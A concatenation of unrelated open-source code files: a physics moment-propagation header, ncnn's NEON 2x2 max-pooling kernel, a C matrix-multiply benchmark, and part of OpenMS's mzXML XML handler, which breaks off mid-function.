auto at_search(const math::polynomial::Term <T> & term,
const arma::mat & points,
const arma::vec & weights,
const arma::vec & expectations,
const arma::uvec & table,
const arma::vec & scaling,
const arma::uword grade) {
if ((arma::uword) arma::sum(term.exponents) >= grade) {
return expectation(term, points, weights, scaling);
} else {
const arma::uvec indices = arma::conv_to<arma::uvec>::from(term.exponents);
return term.coef *
expectations(math::space::indices_to_index(indices, table));
}
}
template<typename T>
auto at_search(const math::Polynomial <T> & polynomial,
const arma::mat & points,
const arma::vec & weights,
const arma::vec & expectations,
const arma::uvec & table,
const arma::vec & scaling,
const arma::uword grade) {
auto result = at_search(polynomial.term(0), points, weights, expectations,
table, scaling, grade);
for (arma::uword i = 1; i < polynomial.coefs.n_elem; i++) {
result += at_search(polynomial.term(i), points, weights, expectations,
table, scaling, grade);
}
return result;
}
} // namespace details
struct State {
public:
arma::mat points;
arma::vec weights;
arma::vec masses;
arma::uword grade;
arma::uvec expectation_table;
arma::vec expectations;
arma::uvec positional_indices;
arma::uvec momentum_indices;
arma::vec scaling;
// Construct a State from an initial phase-space distribution sampled on a grid
template<typename PhaseSpaceDistribution>
State(const PhaseSpaceDistribution & initial,
const arma::uvec & grid,
const arma::mat & range,
const arma::vec & masses,
const arma::uword grade) :
points(math::space::points_generate(grid, range)),
weights(arma::real(at(initial, points))),
masses(masses),
grade(grade),
expectation_table(math::space::grids_to_table(
grade * arma::ones<arma::uvec>(points.n_rows))) {
if (grid.n_rows != range.n_rows) {
throw Error("Different dimension between the grid and the range");
}
if (grid.n_rows != 2 * masses.n_rows) {
throw Error("Different dimension between the grid and the masses");
}
const arma::uword dimension = grid.n_elem;
const arma::uword length = std::pow(grade, dimension);
this->expectations = arma::vec(length);
this->positional_indices = arma::uvec(dimension / 2);
this->momentum_indices = arma::uvec(dimension / 2);
const arma::vec ranges = range.col(1) - range.col(0);
this->scaling = ranges;
// Cache the flat indices of the first-order <x_i> and <p_i> moments
#pragma omp parallel for
for (arma::uword i = 0; i < dimension / 2; i++) {
arma::uvec X = arma::zeros<arma::uvec>(dimension);
arma::uvec P = arma::zeros<arma::uvec>(dimension);
X(i) = 1;
P(i + dimension / 2) = 1;
this->positional_indices(i) =
math::space::indices_to_index(X, this->expectation_table);
this->momentum_indices(i) =
math::space::indices_to_index(P, this->expectation_table);
}
// Evaluate every monomial moment of the initial distribution
#pragma omp parallel for
for (arma::uword i = 0; i < length; i++) {
const lvec indices =
arma::conv_to<lvec>::from(
math::space::index_to_indices(i, this->expectation_table));
this->expectations(i) =
details::expectation(math::polynomial::Term(1.0, indices),
this->points, this->weights, this->scaling);
}
}
template<typename PhaseSpaceDistribution>
State(const PhaseSpaceDistribution & initial,
const arma::uvec & grid,
const arma::mat & range,
const arma::uword grade) :
points(math::space::points_generate(grid, range)),
weights(arma::real(at(initial, points))),
masses(arma::ones<arma::vec>(grid.n_rows / 2)),
grade(grade),
expectation_table(math::space::grids_to_table(
grade * arma::ones<arma::uvec>(points.n_rows))) {
if (grid.n_rows != range.n_rows) {
throw Error("Different dimension between the grid and the range");
}
if (grid.n_rows != 2 * masses.n_rows) {
throw Error("Different dimension between the grid and the masses");
}
const auto dimension = grid.n_elem;
const auto length = std::pow(grade, dimension);
this->expectations = arma::vec(length);
this->positional_indices = arma::uvec(dimension / 2);
this->momentum_indices = arma::uvec(dimension / 2);
const arma::vec ranges = range.col(1) - range.col(0);
this->scaling = ranges;
// Cache the flat indices of the first-order <x_i> and <p_i> moments
for (arma::uword i = 0; i < dimension / 2; i++) {
arma::uvec X = arma::zeros<arma::uvec>(dimension);
arma::uvec P = arma::zeros<arma::uvec>(dimension);
X(i) = 1;
P(i + dimension / 2) = 1;
this->positional_indices(i) =
math::space::indices_to_index(X, this->expectation_table);
this->momentum_indices(i) =
math::space::indices_to_index(P, this->expectation_table);
}
// Evaluate every monomial moment of the initial distribution
for (arma::uword i = 0; i < length; i++) {
const lvec indices =
arma::conv_to<lvec>::from(
math::space::index_to_indices(i, this->expectation_table));
this->expectations(i) =
details::expectation(math::polynomial::Term(1.0, indices),
this->points, this->weights, this->scaling);
}
}
inline
State(const arma::mat & points,
const arma::vec & weights,
const arma::vec & masses,
const arma::uvec & expectation_table,
const arma::vec & expectations,
const arma::uvec & positional_indices,
const arma::uvec & momentum_indices,
const arma::vec & scaling,
const arma::uword grade) :
points(points),
weights(weights),
masses(masses),
grade(grade),
expectation_table(expectation_table),
expectations(expectations),
positional_indices(positional_indices),
momentum_indices(momentum_indices),
scaling(scaling) {}
inline
State(const State & state) :
points(state.points),
weights(state.weights),
masses(state.masses),
grade(state.grade),
expectation_table(state.expectation_table),
expectations(state.expectations),
positional_indices(state.positional_indices),
momentum_indices(state.momentum_indices),
scaling(state.scaling) {}
inline
arma::uword dim() const {
return points.n_rows / 2;
}
inline
State normalise() const {
State state = *this;
state.weights = state.weights / arma::sum(state.weights);
return state;
}
inline
arma::vec positional_expectation() const {
const arma::vec result = this->expectations(this->positional_indices);
const arma::vec scale = this->scaling.rows(0, this->dim() - 1);
return result % scale; // elementwise: rescale back to physical units
}
inline
arma::vec momentum_expectation() const {
const arma::vec result = this->expectations(this->momentum_indices);
const arma::vec scale = this->scaling.rows(this->dim(),
2 * this->dim() - 1);
return result % scale; // elementwise: rescale back to physical units
}
State operator+(const State & B) const {
if (!arma::approx_equal(this->weights, B.weights, "abs_diff", 1e-16) ||
!arma::approx_equal(this->masses, B.masses, "abs_diff", 1e-16)) {
throw Error("Different cwa states are being added");
}
State state = B;
state.points += this->points;
state.expectations += this->expectations;
return state;
}
State operator*(const double B) const {
State state = *this;
state.expectations *= B;
state.points *= B;
return state;
}
template<typename T>
auto expectation(const math::Polynomial <T> & polynomial) const {
return details::at_search(polynomial,
this->points,
this->weights,
this->expectations,
this->expectation_table,
this->scaling,
this->grade) * polynomial.at(this->scaling);
}
template<typename T>
arma::vec expectation(const std::vector<math::Polynomial < T>>
& polynomials) const {
arma::vec result(polynomials.size());
#pragma omp parallel for
for (arma::uword i = 0; i < result.n_elem; i++) {
result(i) = this->expectation(polynomials[i]);
}
return result;
}
State & operator=(const State &) = default;
};
struct Operator {
public:
math::Polynomial<double> potential;
math::Polynomial<double> H;
std::vector<math::Polynomial < double>> operators;
Operator(const State & state,
const math::Polynomial<double> & potential) :
potential(potential),
H(hamiltonian(potential, state.masses).scale(state.scaling)),
operators() {
std::vector<math::Polynomial<double>>
op(std::pow(state.grade, state.dim() * 2));
op[0] = math::Polynomial<double>(state.dim() * 2);
for (arma::uword i = 1; i < op.size(); i++) {
const auto observable =
math::Polynomial(math::polynomial::Term<double>(1.0,
math::space::index_to_indices(
i,
state.expectation_table)));
const arma::uword cut_off = std::min(observable.grade(), H.grade()) / 2;
const auto moyal =
moyal_bracket(math::Polynomial(observable), H, state.scaling,
cut_off);
op[i] = moyal;
}
this->operators = op;
}
inline
PropagationType propagation_type() const {
return Classic;
}
State operator()(const State & state) const {
arma::mat p_submatrix = state.points.rows(state.dim(), 2 * state.dim() - 1);
p_submatrix.each_col() /= state.masses;
const arma::mat points_change_list =
arma::join_cols(p_submatrix,
cwa::details::force(this->potential,
state.points.rows(0, state.dim() -
1)));
arma::vec expectation_change_list =
arma::vec(arma::size(state.expectations));
#pragma omp parallel for
for (arma::uword i = 0; i < expectation_change_list.n_elem; i++) {
expectation_change_list(i) =
details::at_search(this->operators[i],
state.points,
state.weights,
state.expectations,
state.expectation_table,
state.scaling,
state.grade);
}
return State(points_change_list,
state.weights,
state.masses,
state.expectation_table,
expectation_change_list,
state.positional_indices,
state.momentum_indices,
state.scaling,
state.grade);
}
Operator & operator=(const Operator &) = default;
};
} // namespace cwa_smd
} // namespace method
#endif //METHODS_CWA_SMD_H
|
pooling_2x2.h | // Tencent is pleased to support the open source community by making ncnn available.
//
// Copyright (C) 2017 THL A29 Limited, a Tencent company. All rights reserved.
//
// Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
// in compliance with the License. You may obtain a copy of the License at
//
// https://opensource.org/licenses/BSD-3-Clause
//
// Unless required by applicable law or agreed to in writing, software distributed
// under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
// CONDITIONS OF ANY KIND, either express or implied. See the License for the
// specific language governing permissions and limitations under the License.
#if __ARM_NEON
#include <arm_neon.h>
#endif // __ARM_NEON
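// 2x2 max pooling with stride 2: every output pixel is the maximum of a
// 2x2 input window; the NEON paths below produce four outputs per
// iteration via pairwise max.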
static void pooling2x2s2_max_neon(const Mat& bottom_blob, Mat& top_blob)
{
int w = bottom_blob.w;
int inch = bottom_blob.c;
int outw = top_blob.w;
int outh = top_blob.h;
const int tailstep = w - 2*outw + w; // skip leftover columns, then the second input row
#pragma omp parallel for
for (int q=0; q<inch; q++)
{
const float* img0 = bottom_blob.channel(q);
float* outptr = top_blob.channel(q);
const float* r0 = img0;
const float* r1 = img0 + w;
for (int i = 0; i < outh; i++)
{
#if __ARM_NEON
int nn = outw >> 2;
int remain = outw - (nn << 2);
#else
int remain = outw;
#endif // __ARM_NEON
#if __ARM_NEON
#if __aarch64__
if (nn > 0)
{
asm volatile(
"0: \n"
"prfm pldl1keep, [%1, #256] \n"
"prfm pldl1keep, [%2, #256] \n"
"ld1 {v0.4s, v1.4s}, [%1], #32 \n"
"ld1 {v2.4s, v3.4s}, [%2], #32 \n"
"fmax v0.4s, v0.4s, v2.4s \n"
"fmax v1.4s, v1.4s, v3.4s \n"
"fmaxp v2.4s, v0.4s, v1.4s \n"
"subs %w0, %w0, #1 \n"
"st1 {v2.4s}, [%3], #16 \n"
"bne 0b \n"
: "=r"(nn), // %0
"=r"(r0), // %1
"=r"(r1), // %2
"=r"(outptr) // %3
: "0"(nn),
"1"(r0),
"2"(r1),
"3"(outptr)
: "cc", "memory", "v0", "v1", "v2", "v3"
);
}
#else
if (nn > 0)
{
asm volatile(
"0: \n"
"pld [%1, #256] \n"
"pld [%2, #256] \n"
"vld1.f32 {d0-d3}, [%1]! \n"
"vld1.f32 {d4-d7}, [%2]! \n"
"vmax.f32 q0, q0, q2 \n"
"vmax.f32 q1, q1, q3 \n"
"vpmax.f32 d4, d0, d1 \n"
"vpmax.f32 d5, d2, d3 \n"
"subs %0, #1 \n"
"vst1.f32 {d4-d5}, [%3]! \n"
"bne 0b \n"
: "=r"(nn), // %0
"=r"(r0), // %1
"=r"(r1), // %2
"=r"(outptr) // %3
: "0"(nn),
"1"(r0),
"2"(r1),
"3"(outptr)
: "cc", "memory", "q0", "q1", "q2", "q3"
);
}
#endif // __aarch64__
#endif // __ARM_NEON
for (; remain>0; remain--)
{
float max0 = std::max(r0[0], r0[1]);
float max1 = std::max(r1[0], r1[1]);
*outptr = std::max(max0, max1);
r0 += 2;
r1 += 2;
outptr++;
}
r0 += tailstep;
r1 += tailstep;
}
}
}
|
mat_mul_p4a_7000.c | /*
* Implementation of mat_mul() for the 7000x7000 case.
*/
#include "./mat_mul.h"
#include "./size.h"
void mat_mul(int *a, int *b, int *c);
void mat_mul(int *a, int *b, int *c)
{
int i, j, k, t;
#pragma omp parallel for private(j, t, k)
for(i = 0; i <= 6999; i += 1)
for(j = 0; j <= 6999; j += 1) {
c[i*7000+j] = 0;
/* the innermost t loop repeats each accumulation 100 times, and b is
indexed by row j, so this computes 100 * (A * B^T) */
for(k = 0; k <= 6999; k += 1)
for(t = 0; t <= 99; t += 1)
c[i*7000+j] += a[i*7000+k]*b[j*7000+k];
}
return;
}
|
MzXMLHandler.h | // --------------------------------------------------------------------------
// OpenMS -- Open-Source Mass Spectrometry
// --------------------------------------------------------------------------
// Copyright The OpenMS Team -- Eberhard Karls University Tuebingen,
// ETH Zurich, and Freie Universitaet Berlin 2002-2015.
//
// This software is released under a three-clause BSD license:
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
// * Neither the name of any author or any participating institution
// may be used to endorse or promote products derived from this software
// without specific prior written permission.
// For a full list of authors, refer to the file AUTHORS.
// --------------------------------------------------------------------------
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL ANY OF THE AUTHORS OR THE CONTRIBUTING
// INSTITUTIONS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
// EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
// PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
// OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
// WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
// ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
// --------------------------------------------------------------------------
// $Maintainer: Andreas Bertsch $
// $Authors: Marc Sturm $
// --------------------------------------------------------------------------
#ifndef OPENMS_FORMAT_HANDLERS_MZXMLHANDLER_H
#define OPENMS_FORMAT_HANDLERS_MZXMLHANDLER_H
#include <OpenMS/CONCEPT/ProgressLogger.h>
#include <OpenMS/FORMAT/Base64.h>
#include <OpenMS/FORMAT/OPTIONS/PeakFileOptions.h>
#include <OpenMS/FORMAT/HANDLERS/XMLHandler.h>
#include <OpenMS/DATASTRUCTURES/String.h>
#include <OpenMS/KERNEL/MSExperiment.h>
#include <OpenMS/INTERFACES/IMSDataConsumer.h>
#include <stack>
namespace OpenMS
{
class MetaInfoInterface;
namespace Internal
{
/**
@brief XML handlers for MzXMLFile
MapType has to be a MSExperiment or have the same interface.
Do not use this class. It is only needed in MzXMLFile.
*/
template <typename MapType>
class MzXMLHandler :
public XMLHandler
{
public:
/**@name Constructors and destructor */
//@{
/// Constructor for a read-only handler
MzXMLHandler(MapType& exp, const String& filename, const String& version, ProgressLogger& logger) :
XMLHandler(filename, version),
exp_(&exp),
cexp_(0),
decoder_(),
nesting_level_(0),
skip_spectrum_(false),
spec_write_counter_(1),
consumer_(NULL),
scan_count_(0),
logger_(logger)
{
init_();
}
/// Constructor for a write-only handler
MzXMLHandler(const MapType& exp, const String& filename, const String& version, const ProgressLogger& logger) :
XMLHandler(filename, version),
exp_(0),
cexp_(&exp),
decoder_(),
nesting_level_(0),
skip_spectrum_(false),
spec_write_counter_(1),
consumer_(NULL),
scan_count_(0),
logger_(logger)
{
init_();
}
/// Destructor
virtual ~MzXMLHandler() {}
//@}
// Docu in base class
virtual void endElement(const XMLCh* const uri, const XMLCh* const local_name, const XMLCh* const qname);
// Docu in base class
virtual void startElement(const XMLCh* const uri, const XMLCh* const local_name, const XMLCh* const qname, const xercesc::Attributes& attributes);
// Docu in base class
virtual void characters(const XMLCh* const chars, const XMLSize_t length);
/// Write the contents to a stream
void writeTo(std::ostream& os);
/// Sets the options
void setOptions(const PeakFileOptions& options)
{
options_ = options;
}
///Gets the scan count
UInt getScanCount()
{
return scan_count_;
}
/// Set the IMSDataConsumer consumer which will consume the read data
void setMSDataConsumer(Interfaces::IMSDataConsumer<MapType> * consumer)
{
consumer_ = consumer;
}
private:
/// initialize members (call from C'tor)
void init_()
{
cv_terms_.resize(6);
//Polarity
String("any;+;-").split(';', cv_terms_[0]);
//Scan type
// no longer used; cv_terms_[1] stays empty
//Ionization method
String(";ESI;EI;CI;FAB;;;;;;;;;;;;;APCI;;;;;;;;MALDI").split(';', cv_terms_[2]);
cv_terms_[2].resize(IonSource::SIZE_OF_IONIZATIONMETHOD);
//Mass analyzer
String(";Quadrupole;Quadrupole Ion Trap;;;TOF;Magnetic Sector;FT-ICR;").split(';', cv_terms_[3]);
cv_terms_[3].resize(MassAnalyzer::SIZE_OF_ANALYZERTYPE);
//Detector
String(";EMT;;;Faraday Cup;;;;;Channeltron;Daly;Microchannel plate").split(';', cv_terms_[4]);
cv_terms_[4].resize(IonDetector::SIZE_OF_TYPE);
//Resolution method
String(";FWHM;TenPercentValley;Baseline").split(';', cv_terms_[5]);
cv_terms_[5].resize(MassAnalyzer::SIZE_OF_RESOLUTIONMETHOD);
/* // OLD:
cv_terms_.resize(6);
//Polarity
String("any;+;-").split(';',cv_terms_[0]);
//Scan type
// is no longer used cv_terms_[1] is empty now
//Ionization method
String(";ESI;EI;CI;FAB;TSP;MALDI;FD;FI;PD;SI;TI;API;ISI;CID;CAD;HN;APCI;APPI;ICP").split(';',cv_terms_[2]);
//Mass analyzer
String(";Quadrupole;Quadrupole Ion Trap;;;TOF;Magnetic Sector;FT-ICR;").split(';',cv_terms_[3]);
//Detector
String(";EMT;Daly;;Faraday Cup;;;;Channeltron").split(';',cv_terms_[4]);
//Resolution method
String(";FWHM;TenPercentValley;Baseline").split(';',cv_terms_[5]);
*/
}
protected:
/// Peak type
typedef typename MapType::PeakType PeakType;
/// Spectrum type
typedef MSSpectrum<PeakType> SpectrumType;
/// map pointer for reading
MapType* exp_;
/// map pointer for writing
const MapType* cexp_;
/// Options for loading and storing
PeakFileOptions options_;
/**@name temporary data structures to hold parsed data */
//@{
Base64 decoder_;
Int nesting_level_;
/**
@brief Data necessary to generate a single spectrum
Small struct holds all data necessary to populate a spectrum at a
later timepoint (since reading of the base64 data and generation of
spectra can be done at distinct timepoints).
*/
struct SpectrumData
{
UInt peak_count_;
String precision_;
String compressionType_;
String char_rest_;
SpectrumType spectrum;
bool skip_data;
};
/// Vector of spectrum data stored for later parallel processing
std::vector< SpectrumData > spectrum_data_;
//@}
/// Flag that indicates whether this spectrum should be skipped (due to options)
bool skip_spectrum_;
/// spectrum counter (spectra without peaks are not written)
UInt spec_write_counter_;
/// Consumer class to work on spectra
Interfaces::IMSDataConsumer<MapType>* consumer_;
/// Number of scans read so far
UInt scan_count_;
/// Progress logging class
const ProgressLogger& logger_;
/// write metaInfo to xml (usually in nameValue-tag)
inline void writeUserParam_(std::ostream& os, const MetaInfoInterface& meta, int indent = 4, String tag = "nameValue")
{
std::vector<String> keys; // Vector to hold keys to meta info
meta.getKeys(keys);
for (std::vector<String>::const_iterator it = keys.begin(); it != keys.end(); ++it)
{
if ((*it)[0] != '#') // internally used meta info start with '#'
{
os << String(indent, '\t') << "<" << tag << " name=\"" << *it << "\" value=\"" << writeXMLEscape(meta.getMetaValue(*it)) << "\"/>\n";
}
}
}
/// data processing auxiliary variable
std::vector< boost::shared_ptr< DataProcessing> > data_processing_;
/**
@brief Fill a single spectrum with data from input
@note Do not modify any internal state variables of the class since
this function will be executed in parallel.
*/
void doPopulateSpectraWithData_(SpectrumData & spectrum_data)
{
typedef typename SpectrumType::PeakType PeakType;
//std::cout << "reading scan" << "\n";
if (spectrum_data.char_rest_ == "") // no peaks
{
return;
}
//remove whitespaces from binary data
//this should not be necessary, but linebreaks inside the base64 data are unfortunately no exception
spectrum_data.char_rest_.removeWhitespaces();
if (spectrum_data.precision_ == "64")
{
std::vector<double> data;
if (spectrum_data.compressionType_ == "zlib")
{
decoder_.decode(spectrum_data.char_rest_, Base64::BYTEORDER_BIGENDIAN, data, true);
}
else
{
decoder_.decode(spectrum_data.char_rest_, Base64::BYTEORDER_BIGENDIAN, data);
}
spectrum_data.char_rest_ = "";
PeakType peak;
//push_back the peaks into the container
for (Size n = 0; n < (2 * spectrum_data.peak_count_); n += 2)
{
// check if peak in in the specified m/z and intensity range
if ((!options_.hasMZRange() || options_.getMZRange().encloses(DPosition<1>(data[n])))
&& (!options_.hasIntensityRange() || options_.getIntensityRange().encloses(DPosition<1>(data[n + 1]))))
{
peak.setMZ(data[n]);
peak.setIntensity(data[n + 1]);
spectrum_data.spectrum.push_back(peak);
}
}
}
else //precision 32
{
std::vector<float> data;
if (spectrum_data.compressionType_ == "zlib")
{
decoder_.decode(spectrum_data.char_rest_, Base64::BYTEORDER_BIGENDIAN, data, true);
}
else
{
decoder_.decode(spectrum_data.char_rest_, Base64::BYTEORDER_BIGENDIAN, data);
}
spectrum_data.char_rest_ = "";
PeakType peak;
//push_back the peaks into the container
for (Size n = 0; n < (2 * spectrum_data.peak_count_); n += 2)
{
if ((!options_.hasMZRange() || options_.getMZRange().encloses(DPosition<1>(data[n])))
&& (!options_.hasIntensityRange() || options_.getIntensityRange().encloses(DPosition<1>(data[n + 1]))))
{
peak.setMZ(data[n]);
peak.setIntensity(data[n + 1]);
spectrum_data.spectrum.push_back(peak);
}
}
}
}
/**
@brief Populate all spectra on the stack with data from input
Will populate all spectra on the current work stack with data (using
multiple threads if available) and append them to the result.
*/
void populateSpectraWithData_()
{
// Whether spectrum should be populated with data
if (options_.getFillData())
{
size_t errCount = 0;
#ifdef _OPENMP
#pragma omp parallel for
#endif
for (SignedSize i = 0; i < (SignedSize)spectrum_data_.size(); i++)
{
// parallel exception catching and re-throwing business
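// (C++ exceptions must not escape an OpenMP parallel region, so each thread
// only increments errCount under a critical section and the error is
// re-thrown serially after the loop)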
if (!errCount) // no need to parse further if already an error was encountered
{
try
{
doPopulateSpectraWithData_(spectrum_data_[i]);
if (options_.getSortSpectraByMZ() && !spectrum_data_[i].spectrum.isSorted())
{
spectrum_data_[i].spectrum.sortByPosition();
}
}
catch (...)
{
#pragma omp critical(HandleException)
++errCount;
}
}
}
if (errCount != 0)
{
throw Exception::ParseError(__FILE__, __LINE__, __PRETTY_FUNCTION__, file_, "Error during parsing of binary data.");
}
}
// Append all spectra
for (Size i = 0; i < spectrum_data_.size(); i++)
{
if (consumer_ != NULL)
{
consumer_->consumeSpectrum(spectrum_data_[i].spectrum);
if (options_.getAlwaysAppendData())
{
exp_->addSpectrum(spectrum_data_[i].spectrum);
}
}
else
{
exp_->addSpectrum(spectrum_data_[i].spectrum);
}
}
// Delete batch
spectrum_data_.clear();
}
private:
/// Not implemented
MzXMLHandler();
static const XMLCh* s_value_;
static const XMLCh* s_count_;
static const XMLCh* s_type_;
static const XMLCh* s_name_;
static const XMLCh* s_version_;
static const XMLCh* s_filename_;
static const XMLCh* s_filetype_;
static const XMLCh* s_filesha1_;
static const XMLCh* s_completiontime_;
static const XMLCh* s_precision_;
static const XMLCh* s_byteorder_;
static const XMLCh* s_pairorder_;
static const XMLCh* s_compressionType_;
static const XMLCh* s_precursorintensity_;
static const XMLCh* s_precursorcharge_;
static const XMLCh* s_windowwideness_;
static const XMLCh* s_mslevel_;
static const XMLCh* s_peakscount_;
static const XMLCh* s_polarity_;
static const XMLCh* s_scantype_;
static const XMLCh* s_filterline_;
static const XMLCh* s_retentiontime_;
static const XMLCh* s_startmz_;
static const XMLCh* s_endmz_;
static const XMLCh* s_first_;
static const XMLCh* s_last_;
static const XMLCh* s_phone_;
static const XMLCh* s_email_;
static const XMLCh* s_uri_;
static const XMLCh* s_num_;
static const XMLCh* s_intensitycutoff_;
static const XMLCh* s_centroided_;
static const XMLCh* s_deisotoped_;
static const XMLCh* s_chargedeconvoluted_;
// initialize all static members; necessary because the undefined initialization order across translation units would otherwise cause problems
void initStaticMembers_()
{
static bool init(false);
if (!init)
{
s_value_ = xercesc::XMLString::transcode("value");
s_count_ = xercesc::XMLString::transcode("scanCount");
s_type_ = xercesc::XMLString::transcode("type");
s_name_ = xercesc::XMLString::transcode("name");
s_version_ = xercesc::XMLString::transcode("version");
s_filename_ = xercesc::XMLString::transcode("fileName");
s_filetype_ = xercesc::XMLString::transcode("fileType");
s_filesha1_ = xercesc::XMLString::transcode("fileSha1");
s_completiontime_ = xercesc::XMLString::transcode("completionTime");
s_precision_ = xercesc::XMLString::transcode("precision");
s_byteorder_ = xercesc::XMLString::transcode("byteOrder");
s_pairorder_ = xercesc::XMLString::transcode("pairOrder");
s_compressionType_ = xercesc::XMLString::transcode("compressionType");
s_precursorintensity_ = xercesc::XMLString::transcode("precursorIntensity");
s_precursorcharge_ = xercesc::XMLString::transcode("precursorCharge");
s_windowwideness_ = xercesc::XMLString::transcode("windowWideness");
s_mslevel_ = xercesc::XMLString::transcode("msLevel");
s_peakscount_ = xercesc::XMLString::transcode("peaksCount");
s_polarity_ = xercesc::XMLString::transcode("polarity");
s_scantype_ = xercesc::XMLString::transcode("scanType");
s_filterline_ = xercesc::XMLString::transcode("filterLine");
s_retentiontime_ = xercesc::XMLString::transcode("retentionTime");
s_startmz_ = xercesc::XMLString::transcode("startMz");
s_endmz_ = xercesc::XMLString::transcode("endMz");
s_first_ = xercesc::XMLString::transcode("first");
s_last_ = xercesc::XMLString::transcode("last");
s_phone_ = xercesc::XMLString::transcode("phone");
s_email_ = xercesc::XMLString::transcode("email");
s_uri_ = xercesc::XMLString::transcode("URI");
s_num_ = xercesc::XMLString::transcode("num");
s_intensitycutoff_ = xercesc::XMLString::transcode("intensityCutoff");
s_centroided_ = xercesc::XMLString::transcode("centroided");
s_deisotoped_ = xercesc::XMLString::transcode("deisotoped");
s_chargedeconvoluted_ = xercesc::XMLString::transcode("chargeDeconvoluted");
init = true;
}
return;
}
};
//--------------------------------------------------------------------------------
// this cannot be moved into a function, as VS2008 does not allow more than 31 static members in a function (don't ask)
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_value_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_count_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_type_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_name_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_version_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_filename_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_filetype_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_filesha1_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_completiontime_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_precision_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_byteorder_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_pairorder_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_compressionType_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_precursorintensity_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_precursorcharge_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_windowwideness_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_mslevel_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_peakscount_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_polarity_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_scantype_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_filterline_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_retentiontime_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_startmz_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_endmz_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_first_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_last_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_phone_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_email_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_uri_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_num_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_intensitycutoff_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_centroided_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_deisotoped_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_chargedeconvoluted_ = 0;
template <typename MapType>
void MzXMLHandler<MapType>::startElement(const XMLCh* const /*uri*/,
const XMLCh* const /*local_name*/, const XMLCh* const qname,
const xercesc::Attributes& attributes)
{
OPENMS_PRECONDITION(nesting_level_ >= 0, "Nesting level needs to be zero or more")
static bool init_static_members(false);
if (!init_static_members)
{
initStaticMembers_();
}
String tag = sm_.convert(qname);
open_tags_.push_back(tag);
//std::cout << " -- Start -- "<< tag << " -- " << "\n";
//Skip all tags until the next scan
if (skip_spectrum_ && tag != "scan")
return;
if (tag == "msRun")
{
Int count = 0;
optionalAttributeAsInt_(count, attributes, s_count_);
exp_->reserve(count);
logger_.startProgress(0, count, "loading mzXML file");
scan_count_ = 0;
data_processing_.clear();
//start and end time are xs:duration. This makes no sense => ignore them
}
else if (tag == "parentFile")
{
SourceFile sf;
sf.setNameOfFile(attributeAsString_(attributes, s_filename_));
sf.setFileType(attributeAsString_(attributes, s_filetype_));
sf.setChecksum(attributeAsString_(attributes, s_filesha1_), SourceFile::SHA1);
exp_->getSourceFiles().push_back(sf);
}
else if (tag == "software")
{
String& parent_tag = *(open_tags_.end() - 2);
if (parent_tag == "dataProcessing")
{
data_processing_.back()->getSoftware().setVersion(attributeAsString_(attributes, s_version_));
data_processing_.back()->getSoftware().setName(attributeAsString_(attributes, s_name_));
data_processing_.back()->setMetaValue("#type", String(attributeAsString_(attributes, s_type_)));
String time;
optionalAttributeAsString_(time, attributes, s_completiontime_);
data_processing_.back()->setCompletionTime(asDateTime_(time));
}
else if (parent_tag == "msInstrument")
{
